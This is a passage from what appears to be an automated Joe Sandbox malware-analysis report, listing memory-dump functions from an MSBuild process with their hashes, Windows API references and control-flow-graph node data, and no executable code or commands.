                                                                                                                                                                                                                                                Function 054E0001 Relevance: .5, Instructions: 518COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 8dabb88e5855b8759aabcbbb9f855f877e8b10476d1fa37449e9dea6a31882aa
                                                                                                                                                                                                                                                • Instruction ID: 84c7321fddf10925e661f56d4b9dd858cc458c7d9fa15228b94de23d43056d81
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8dabb88e5855b8759aabcbbb9f855f877e8b10476d1fa37449e9dea6a31882aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4112E2317093409FEB168B74DC58BAB3BB6BF86301F14409AE546DF3A2CAB59C45C722
                                                                                                                                                                                                                                                Function 072A4290 Relevance: .5, Instructions: 491COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: b3adac0c798a796814b7e995c0e6f54843a3f1bfb94f21888d1769843407ebbd
                                                                                                                                                                                                                                                • Instruction ID: 6c05ec7bdb5f2cf8d215c1144b65ec27c12957c4a0f30ba7a66816d5579e6852
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b3adac0c798a796814b7e995c0e6f54843a3f1bfb94f21888d1769843407ebbd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 01029FB4B20246AFCB04EF68D884AADB7F6BF89310F1585A9D805DB361DB70EC45CB51
                                                                                                                                                                                                                                                Function 072A7A88 Relevance: .5, Instructions: 467COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 332da5965045b39734e08f41a9026556e6a4d7ee353c18ecbbdbe20a5448d34b
                                                                                                                                                                                                                                                • Instruction ID: 80770b508353eb474d1ea9151248e69fbf598b98e460e3e1ba88741bc3cf10cd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 332da5965045b39734e08f41a9026556e6a4d7ee353c18ecbbdbe20a5448d34b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85024AB4A10206AFDB15DFA8C854AAEBBF2FF89310F148569E509DB355CB31EC41CB90
                                                                                                                                                                                                                                                Function 071B3AD0 Relevance: .5, Instructions: 456COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dabdc69df1d087a6921af15b95078f025072b66262a97caa0988b8157146b3b3
                                                                                                                                                                                                                                                • Instruction ID: 2f96352d0451bc7379ac55728212d97f5c70cf7d89a4916f6db644d2bcab6d17
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dabdc69df1d087a6921af15b95078f025072b66262a97caa0988b8157146b3b3
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC126AB4A003059FD715DFA8C584AAABBF2FF88310B1AC599E419DB762C730ED41CB60
                                                                                                                                                                                                                                                Function 072A9EB8 Relevance: .4, Instructions: 433COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: cfb9d4364be9946d75343a77ce132a9a8d4d4e1a960d9e12ad555446c418ea24
                                                                                                                                                                                                                                                • Instruction ID: d504cb82fd92276c40c67d2b8955de5f2b1beda60676827caa0d1a50d36960e9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfb9d4364be9946d75343a77ce132a9a8d4d4e1a960d9e12ad555446c418ea24
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 42026FB0A10306EFDB25CFA5C880AAEB7F2FF88310F148969E4469B651D775E845CF50
                                                                                                                                                                                                                                                Function 071B1E28 Relevance: .4, Instructions: 406COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 0bfffd431bb8e028948bd72b77f72a4d06a6c37dbdf69dee642625b7256043e2
                                                                                                                                                                                                                                                • Instruction ID: 1f443ad7039cfd14929076ee83709d3c6e70b8ac3b3d77b3c0c708494a4c315b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bfffd431bb8e028948bd72b77f72a4d06a6c37dbdf69dee642625b7256043e2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE026BB5A00705DFDB25CF69C584AAABBF2BF88300F158569E45ADB7A1C734E849CF40
                                                                                                                                                                                                                                                Function 0711D5E8 Relevance: .4, Instructions: 401COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 546eab84481b37fcb47f7f0c2e49559b2421e20e0503d1742327702732f356dc
                                                                                                                                                                                                                                                • Instruction ID: 89e5afad8af44dfe78828682356f583bff676fce3dc0b1206bb47861804c4e45
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 546eab84481b37fcb47f7f0c2e49559b2421e20e0503d1742327702732f356dc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 93F13DB0A00209DFDB08DFA4D884AADBBB2FF89310F158569D846AF395DB35E945CB50
                                                                                                                                                                                                                                                Function 0153E872 Relevance: 6.1, APIs: 4, Instructions: 133threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0153E8FE
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0153E93B
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0153E978
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0153E9D1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                • Opcode ID: 7d4ce7542242f79039396f0b8875dd51468dc39b6d955f71ed03dae327b6758a
                                                                                                                                                                                                                                                • Instruction ID: 309ec802a5ccc7467930071106c4bdcb4ac55fd0d92f24eb61aad6bb07bd8187
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7d4ce7542242f79039396f0b8875dd51468dc39b6d955f71ed03dae327b6758a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 905146B09003498FDB54CFA9D4897EEBBF1FF88314F24845AE419AB2A0D7745944CF65
                                                                                                                                                                                                                                                Function 0153E880 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0153E8FE
                                                                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 0153E93B
                                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32 ref: 0153E978
                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 0153E9D1
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Current$ProcessThread
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2063062207-0
                                                                                                                                                                                                                                                • Opcode ID: 331458f55577d78517a02c87e8c315d94113deebc91c0bb2a976d734f87eca46
                                                                                                                                                                                                                                                • Instruction ID: ef0359fac705d00e6bf7e9435746ecceb88802624dc8ab4fdb9c5d9e8fd46430
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 331458f55577d78517a02c87e8c315d94113deebc91c0bb2a976d734f87eca46
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 475145B09002098FEB54DFAAD489BEEBBF1FF88314F208459E419AB390D7749944CF65
                                                                                                                                                                                                                                                Function 07118220 Relevance: 4.2, Strings: 3, Instructions: 405COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 44 7118220-7118238 46 7118247-7118252 44->46 47 711823a-7118245 44->47 51 7118262-7118264 46->51 52 7118254-711825d 46->52 47->46 50 7118269-7118274 47->50 56 71182b4-71182b9 50->56 57 7118276-7118298 50->57 53 71186df-71186eb 51->53 52->53 56->53 61 711829a-71182b2 57->61 62 71182be-71182cc 57->62 61->56 61->62 65 7118480-711848e 62->65 66 71182d2-71182e0 62->66 71 7118494-71184a2 65->71 72 71185cf-71185dd 65->72 66->65 70 71182e6-71182f1 66->70 79 71182f7-7118303 70->79 80 7118479-711847b 70->80 71->72 76 71184a8-71184b3 71->76 77 71185e3-71185f1 72->77 78 71186dd 72->78 85 71184b9-71184dd 76->85 86 71185c8-71185ca 76->86 77->78 87 71185f7-7118602 77->87 78->53 79->80 84 7118309-7118315 79->84 80->53 84->80 91 711831b-711833c 84->91 85->86 99 71184e3-7118501 85->99 86->53 92 71186d9-71186db 87->92 93 7118608-7118629 87->93 91->80 104 7118342-7118366 91->104 92->53 93->92 105 711862f-7118653 93->105 99->86 107 7118507-7118523 99->107 104->80 117 711836c-711838e 104->117 105->92 119 7118659-711867d 105->119 113 7118525-711853b 107->113 114 7118566-7118567 107->114 123 7118544-7118564 113->123 124 711853d 113->124 168 711856c call 71b6f90 114->168 169 711856c call 71b6fa0 114->169 117->80 138 7118394-71183b2 117->138 119->92 139 711867f-71186ab 119->139 120 7118572-711857f 121 7118581-7118595 120->121 122 71185bd-71185c3 120->122 130 7118597 121->130 131 711859e-71185bb 121->131 122->53 123->114 124->123 130->131 131->122 138->80 145 71183b8-71183d4 138->145 139->92 147 71186ad-71186d7 139->147 149 7118417-7118430 145->149 150 71183d6-71183ec 145->150 147->53 157 7118432-7118446 149->157 158 711846e-7118474 149->158 154 71183f5-7118415 150->154 155 71183ee 150->155 154->149 155->154 163 7118448 157->163 164 711844f-711846c 157->164 158->53 163->164 164->158 168->120 169->120
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672543242.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7110000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: #0$30$c.
                                                                                                                                                                                                                                                • API String ID: 0-3986760010
                                                                                                                                                                                                                                                • Opcode ID: 41b2b6ee82fa42eed305afee00e13d2bd6ba1d3217c174e18977cbf4b99e4a59
                                                                                                                                                                                                                                                • Instruction ID: 40fd2621b19a7376102ecbe297b72e425548ca68c387b45e17768118138a1609
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 41b2b6ee82fa42eed305afee00e13d2bd6ba1d3217c174e18977cbf4b99e4a59
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CBE15CB43106128FC755DF7AC894A2AB7E6AF88A6471581B9E906CF3B5EF70DC01CB50
                                                                                                                                                                                                                                                Function 071B8B80 Relevance: 3.3, Instructions: 3302COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 362 71b8b80-71b8b8c 363 71b8b8e 362->363 364 71b8b90-71b8b96 362->364 363->364 365 71b8b98-71b8b9d 364->365 366 71b8bc7-71b8c48 364->366 367 71b8b9f-71b8ba4 365->367 368 71b8bb6-71b8bbc 365->368 377 71b8c4a-71b8c8f 366->377 378 71b8c9f-71b8cc1 366->378 1061 71b8ba6 call 71b8b72 367->1061 1062 71b8ba6 call 71b8b80 367->1062 368->366 370 71b8bbe-71b8bc6 368->370 371 71b8bac-71b8baf 371->368 1063 71b8c91 call 71bc550 377->1063 1064 71b8c91 call 71bc5a0 377->1064 381 71b8cc3 378->381 382 71b8cc5-71b8cdc 378->382 381->382 385 71b8ce9-71b8e7d 382->385 386 71b8cde-71b8ce8 382->386 411 71bc45a-71bc498 385->411 412 71b8e83-71b8edd 385->412 389 71b8c97-71b8c9e 412->411 418 71b8ee3-71bbc82 412->418 418->411 969 71bbc88-71bbcf7 418->969 969->411 974 71bbcfd-71bbd6c 969->974 974->411 979 71bbd72-71bc2eb 974->979 979->411 1044 71bc2f1-71bc459 979->1044 1061->371 1062->371 1063->389 1064->389
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 2bfa47feb939a53dddb723870e28689520eb7416ab9743fa345687df902b439f
                                                                                                                                                                                                                                                • Instruction ID: 7c2b38e1dd5752d13d99a1547cd5c61b2ba478a7c820d8d164ad1f2f68b75a3b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bfa47feb939a53dddb723870e28689520eb7416ab9743fa345687df902b439f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71634AB0A40318AFEB259B50CD55BEEBB76EB88700F1040D9E7097B2D0CA765E85DF58
                                                                                                                                                                                                                                                Function 072AD010 Relevance: 2.6, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 2379 72ad010-72ad075 2385 72ad07b-72ad0e8 2379->2385 2386 72ad181-72ad18c 2379->2386 2394 72ad0ea-72ad100 2385->2394 2395 72ad12d-72ad160 2385->2395 2398 72ad109-72ad12a 2394->2398 2399 72ad102 2394->2399 2404 72ad167-72ad179 2395->2404 2398->2395 2399->2398 2404->2386
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 3H$SH
                                                                                                                                                                                                                                                • API String ID: 0-847617511
                                                                                                                                                                                                                                                • Opcode ID: a453dc796e825c4e6caec2b79e8125fe46f78646e4a8919dd2f8e8f9db67f97b
                                                                                                                                                                                                                                                • Instruction ID: 75314493b25ce8f9a91f3e7e60ee5edaea025c82a1a95181d63d01f5e4d51f48
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a453dc796e825c4e6caec2b79e8125fe46f78646e4a8919dd2f8e8f9db67f97b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B14161B1B1060AAFCB05DF69D8909DEBBF6EF88710F108169E405AB754DB31EE05CB94
                                                                                                                                                                                                                                                Function 072AD020 Relevance: 2.6, Strings: 2, Instructions: 110COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: 3H$SH
                                                                                                                                                                                                                                                • API String ID: 0-847617511
                                                                                                                                                                                                                                                • Opcode ID: 83e5305a890f7b2efd2ef2769c1b4007244b7d3525c93188d0c30e31ab811b23
                                                                                                                                                                                                                                                • Instruction ID: 85ea377de4505fbac55534b8a18ee97a5ede8faf4b859f2f059e462f5482ff94
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 83e5305a890f7b2efd2ef2769c1b4007244b7d3525c93188d0c30e31ab811b23
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 234171B0B1020AAFCB05DF69D89099EBBF6FF88710B108129E405EB754DB31ED05CB94
                                                                                                                                                                                                                                                Function 0153C5D9 Relevance: 1.7, APIs: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0153C83E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                • Opcode ID: 3aa294680162b22b619df23ced891db294348b2c0e68f598421d50ec474af392
                                                                                                                                                                                                                                                • Instruction ID: 47e0a3a9480ce1f2587804e0b54f90a760904c3ead69569636dc2b0c964397c3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3aa294680162b22b619df23ced891db294348b2c0e68f598421d50ec474af392
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 558147B0A00B058FD725DF29D44079ABBF1BF88314F108A2ED486EBA50D775E94ACB90
                                                                                                                                                                                                                                                Function 015348A0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01536039
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: 497ded15adb5e8069f8fec39e5fde4dfb09f6c148b22951e204c421f514ed53f
                                                                                                                                                                                                                                                • Instruction ID: 0f7a46421b9940155f4a1cec969f4d77700df1ba1319386fd1bc1c3ed06eee91
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 497ded15adb5e8069f8fec39e5fde4dfb09f6c148b22951e204c421f514ed53f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1841B0B0C00718DBDB24DFA9C884BDEBBF5BF88304F20856AD508AB251DBB56945CF90
                                                                                                                                                                                                                                                Function 01535F7D Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CreateActCtxA.KERNEL32(?), ref: 01536039
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Create
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2289755597-0
                                                                                                                                                                                                                                                • Opcode ID: 97172c6a7ea6408334060b01b57c7a00790bd188314f98504638e823962017ed
                                                                                                                                                                                                                                                • Instruction ID: 9800a746da1ad9219afa92d7d5434a7bc48cd1319fef557ec7f79e2a77d12b1a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97172c6a7ea6408334060b01b57c7a00790bd188314f98504638e823962017ed
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C741B170C00718CBDB24DFA9C8847CEBBB5BF48304F24816AD508AB251DB756945CF50
                                                                                                                                                                                                                                                Function 071C173D Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Clipboard
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 220874293-0
                                                                                                                                                                                                                                                • Opcode ID: 3cf36191a1b352bde0031e032701f859da2838ca86f905cc5e4afc04b9eb9b94
                                                                                                                                                                                                                                                • Instruction ID: 4fcbb570624e4bc68b6e29ee98d4364b1129e3b96310cbeb5e681d3d37870ab8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3cf36191a1b352bde0031e032701f859da2838ca86f905cc5e4afc04b9eb9b94
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BB3114B0905249DFDB14CF99C585BDDBBF1AF48304F248019E004BB390D7B49945CF95
                                                                                                                                                                                                                                                Function 072ABD38 Relevance: 1.6, Strings: 1, Instructions: 323COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: &
                                                                                                                                                                                                                                                • API String ID: 0-1010288
                                                                                                                                                                                                                                                • Opcode ID: 8408ee2b0088b79088c989c34eb7bf7e72691185dd6fb4170e5768a98013dcea
                                                                                                                                                                                                                                                • Instruction ID: 58d006bf330393aca084174cf65d5d45c47baea9576dc17fce451d636b9eee98
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8408ee2b0088b79088c989c34eb7bf7e72691185dd6fb4170e5768a98013dcea
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 49B1ADB5724752EFCB14AF74859063AB7E2FF85710B088A68C8069B381DF75EC45CBA1
                                                                                                                                                                                                                                                Function 071C1748 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Clipboard
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 220874293-0
                                                                                                                                                                                                                                                • Opcode ID: c68157ada5b690baaac73e340459dc50465beb0af659b09de0921a1338db01d4
                                                                                                                                                                                                                                                • Instruction ID: 0eb3c74de44e159be2ddb239babdd62ee0025a2344f9771aac04ed0464e75ef4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c68157ada5b690baaac73e340459dc50465beb0af659b09de0921a1338db01d4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8E31E0B0901249EFDB14DF99C985BCEBBF5AF48314F248019E404BB390DBB4A985CF95
                                                                                                                                                                                                                                                Function 0153EEC8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153EF57
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
